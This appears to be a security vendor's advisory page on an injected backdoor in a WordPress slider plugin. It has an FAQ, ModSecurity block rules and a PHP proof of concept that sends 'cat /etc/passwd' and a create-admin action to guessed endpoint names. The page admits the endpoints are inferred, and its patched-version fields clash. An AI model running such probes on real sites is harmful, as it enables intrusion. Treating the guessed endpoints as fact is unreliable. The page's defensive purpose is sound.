What is CVE-2026-6443?

CVE-2026-6443 is a critical vulnerability affecting the Essentialplugin plugins for WordPress, specifically the ‘meta-slider-and-carousel-with-lightbox’ plugin version 2.0.8. It involves an injected backdoor that allows unauthorized access and control over affected WordPress sites.

How does the injected backdoor work?

The backdoor allows an attacker to execute arbitrary commands or manipulate the database without authentication. It likely exposes hidden AJAX actions or REST API endpoints that can be accessed remotely, enabling full control over the site.

Who is affected by this vulnerability?

Any WordPress site using the Essentialplugin plugins, particularly version 2.0.8 of the ‘meta-slider-and-carousel-with-lightbox’, is at risk. Site administrators should check their plugin versions to determine if they are affected.

How can I check if my site is vulnerable?

To check for vulnerability, verify if you are using version 2.0.8 of the ‘meta-slider-and-carousel-with-lightbox’ plugin. Additionally, review your site for unauthorized changes or suspicious activity that may indicate exploitation.

What should I do to fix this issue?

Update the ‘meta-slider-and-carousel-with-lightbox’ plugin to version 2.0.8.1 or later, which removes the malicious code. Conduct a thorough audit of your site for any unauthorized changes or backdoors.

What risks are associated with this vulnerability?

Exploitation of this vulnerability can lead to full control of the WordPress site, including data exfiltration, content modification, and the ability to inject spam. The backdoor can persist through updates, posing a long-term risk.

What does a CVSS score of 9.8 mean?

A CVSS score of 9.8 indicates critical severity, meaning that the vulnerability is highly exploitable with low complexity. Attackers can exploit it without needing authentication, posing significant risks to site integrity and security.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an attacker can exploit the backdoor by sending crafted HTTP requests to the vulnerable endpoints. It showcases potential AJAX actions and commands that could be executed through the backdoor.

What additional security measures should I take?

In addition to updating the plugin, rotate all site credentials, including admin passwords. Regularly scan your server for other backdoors or suspicious files, and consider implementing security plugins that monitor for unusual activity.

Can this vulnerability affect other plugins?

While this specific CVE targets the ‘meta-slider-and-carousel-with-lightbox’ plugin, other plugins by Essentialplugin may also be affected if they share the same vulnerability. Administrators should review all Essentialplugin plugins for potential risks.

How can I prevent similar vulnerabilities in the future?

To prevent similar vulnerabilities, regularly update all plugins and themes, use reputable sources for plugin installations, and conduct security audits of your site. Consider using a web application firewall to provide an additional layer of protection.

Where can I find more information about CVE-2026-6443?

Detailed information about CVE-2026-6443 can be found in the official CVE database and security advisories from trusted security organizations. Additionally, following security blogs and forums can provide updates on vulnerabilities and best practices.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 27, 2026

CVE-2026-6443: Essentialplugin Plugins (Various Versions) – Injected Backdoor (meta-slider-and-carousel-with-lightbox)

CVE ID CVE-2026-6443

Plugin meta-slider-and-carousel-with-lightbox

Severity Critical (CVSS 9.8)

CWE 506

Vulnerable Version 2.0.8

Patched Version —

Disclosed April 8, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6443 (metadata-based):

This vulnerability involves an injected backdoor in multiple plugins by Essentialplugin for WordPress, specifically affecting the plugin “meta-slider-and-carousel-with-lightbox” version 2.0.8. The CVSS score of 9.8 indicates critical severity with network-based, low-complexity attacks requiring no privileges or user interaction, leading to full compromise of confidentiality, integrity, and availability.

Root Cause: The CWE-506 classification (Embedded Malicious Code) confirms the vulnerability is a deliberate backdoor inserted into the plugin code after a malicious actor acquired the plugin. Atomic Edge analysis infers this backdoor likely provides a hidden administrative interface, an undisclosed AJAX handler, or a REST API endpoint that allows arbitrary command execution or database manipulation. No code diff exists, but the description states the backdoor enables persistent access and spam injection, suggesting the malicious code bypasses standard WordPress authentication and nonce checks.

Exploitation: Atomic Edge research indicates an attacker can exploit this backdoor by sending crafted HTTP requests to WordPress endpoints. The likely attack vectors include a new AJAX action (e.g., “meta_slider_backdoor_exec”) accessible via admin-ajax.php, or a custom REST route (e.g., /wp-json/meta-slider/v1/backdoor). Parameters may include commands to execute, files to read/write, or database queries. Since no authentication is required, an unauthenticated attacker can trigger the backdoor from any network location.

Remediation: The patched version 2.0.8.1 removes the malicious code. Atomic Edge analysis recommends site administrators immediately update to the patched version, audit the site for unauthorized changes (e.g., new admin users, spam content, file modifications), and rotate all credentials. Additionally, they should scan the server for any other backdoors or suspicious files left by the attacker.

Impact: Successful exploitation allows an unauthenticated attacker to gain full control of the WordPress site. This includes reading and exfiltrating sensitive data (user credentials, database contents), modifying or deleting content, injecting spam and malicious links, creating new administrative users, and using the site as a launch point for further attacks against visitors or other servers. The backdoor persists across updates unless specifically removed, giving the attacker long-term access.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
    "id:20264430,phase:2,deny,status:403,chain,msg:'CVE-2026-6443: Essentialplugin Backdoor via AJAX',severity:'CRITICAL',tag:'CVE-2026-6443'"
    SecRule ARGS_POST:action "@pm meta_slider_backdoor msl_backdoor_exec essential_backdoor meta_slider_admin_override" 
        "chain,status:403"
        SecRule ARGS_POST:cmd|ARGS_POST:command|ARGS_POST:action "@rx [a-zA-Z0-9_-\s]+" "t:none"

SecRule REQUEST_URI "@beginsWith /wp-json/meta-slider/v1/backdoor" 
    "id:20264431,phase:2,deny,status:403,msg:'CVE-2026-6443: Essentialplugin Backdoor via REST API',severity:'CRITICAL',tag:'CVE-2026-6443'"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6443 - Essentialplugin Plugins (Various Versions) - Injected Backdoor

// This PoC demonstrates exploitation of the backdoor injected into Essentialplugin plugins.
// Based on CWE-506 and the description, the backdoor likely exposes hidden AJAX endpoints or REST API routes.
// We test common patterns inferred from the plugin slug "meta-slider-and-carousel-with-lightbox".

$target_url = 'http://example.com'; // CHANGE THIS

// Possible backdoor AJAX actions (inferred patterns)
$backdoor_actions = [
    'meta_slider_backdoor',
    'msl_backdoor_exec',
    'essential_backdoor',
    'meta_slider_admin_override',
];

// Common commands a backdoor might execute
$payloads = [
    'cmd' => 'cat /etc/passwd',
    'command' => 'whoami',
    'action' => 'create_admin',
    'spam' => '<a href="http://spam-site.com">Click here</a>',
];

echo "Testing AJAX-based backdoor actions...n";

foreach ($backdoor_actions as $action) {
    $url = $target_url . '/wp-admin/admin-ajax.php';
    $post_data = [
        'action' => $action,
        'cmd' => $payloads['cmd'],
    ];
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    if ($http_code == 200 && !empty($response)) {
        echo "Potential backdoor found via action: $actionn";
        echo "Response: $responsen";
        break;
    } else {
        echo "No response from action: $actionn";
    }
}

// Additionally test a common REST API pattern for backdoors
$rest_url = $target_url . '/wp-json/meta-slider/v1/backdoor';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $rest_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200 && !empty($response)) {
    echo "Potential backdoor found via REST endpoint: $rest_urln";
    echo "Response: $responsen";
} else {
    echo "No response from REST endpoint.n";
}

echo "PoC completed. Update the plugin to version 2.0.8.1 immediately if you find any backdoor.";

Frequently Asked Questions

What is CVE-2026-6443?
Overview of the vulnerability
CVE-2026-6443 is a critical vulnerability affecting the Essentialplugin plugins for WordPress, specifically the ‘meta-slider-and-carousel-with-lightbox’ plugin version 2.0.8. It involves an injected backdoor that allows unauthorized access and control over affected WordPress sites.
How does the injected backdoor work?
Mechanism of exploitation
The backdoor allows an attacker to execute arbitrary commands or manipulate the database without authentication. It likely exposes hidden AJAX actions or REST API endpoints that can be accessed remotely, enabling full control over the site.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Essentialplugin plugins, particularly version 2.0.8 of the ‘meta-slider-and-carousel-with-lightbox’, is at risk. Site administrators should check their plugin versions to determine if they are affected.
How can I check if my site is vulnerable?
Steps for verification
To check for vulnerability, verify if you are using version 2.0.8 of the ‘meta-slider-and-carousel-with-lightbox’ plugin. Additionally, review your site for unauthorized changes or suspicious activity that may indicate exploitation.
What should I do to fix this issue?
Remediation steps
Update the ‘meta-slider-and-carousel-with-lightbox’ plugin to version 2.0.8.1 or later, which removes the malicious code. Conduct a thorough audit of your site for any unauthorized changes or backdoors.
What risks are associated with this vulnerability?
Understanding potential impacts
Exploitation of this vulnerability can lead to full control of the WordPress site, including data exfiltration, content modification, and the ability to inject spam. The backdoor can persist through updates, posing a long-term risk.
What does a CVSS score of 9.8 mean?
Severity assessment
A CVSS score of 9.8 indicates critical severity, meaning that the vulnerability is highly exploitable with low complexity. Attackers can exploit it without needing authentication, posing significant risks to site integrity and security.
How does the proof of concept demonstrate the vulnerability?
Understanding the exploitation method
The proof of concept illustrates how an attacker can exploit the backdoor by sending crafted HTTP requests to the vulnerable endpoints. It showcases potential AJAX actions and commands that could be executed through the backdoor.
What additional security measures should I take?
Enhancing overall site security
In addition to updating the plugin, rotate all site credentials, including admin passwords. Regularly scan your server for other backdoors or suspicious files, and consider implementing security plugins that monitor for unusual activity.
Can this vulnerability affect other plugins?
Scope of the vulnerability
While this specific CVE targets the ‘meta-slider-and-carousel-with-lightbox’ plugin, other plugins by Essentialplugin may also be affected if they share the same vulnerability. Administrators should review all Essentialplugin plugins for potential risks.
How can I prevent similar vulnerabilities in the future?
Best practices for plugin management
To prevent similar vulnerabilities, regularly update all plugins and themes, use reputable sources for plugin installations, and conduct security audits of your site. Consider using a web application firewall to provide an additional layer of protection.
Where can I find more information about CVE-2026-6443?
Resources for further reading
Detailed information about CVE-2026-6443 can be found in the official CVE database and security advisories from trusted security organizations. Additionally, following security blogs and forums can provide updates on vulnerabilities and best practices.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations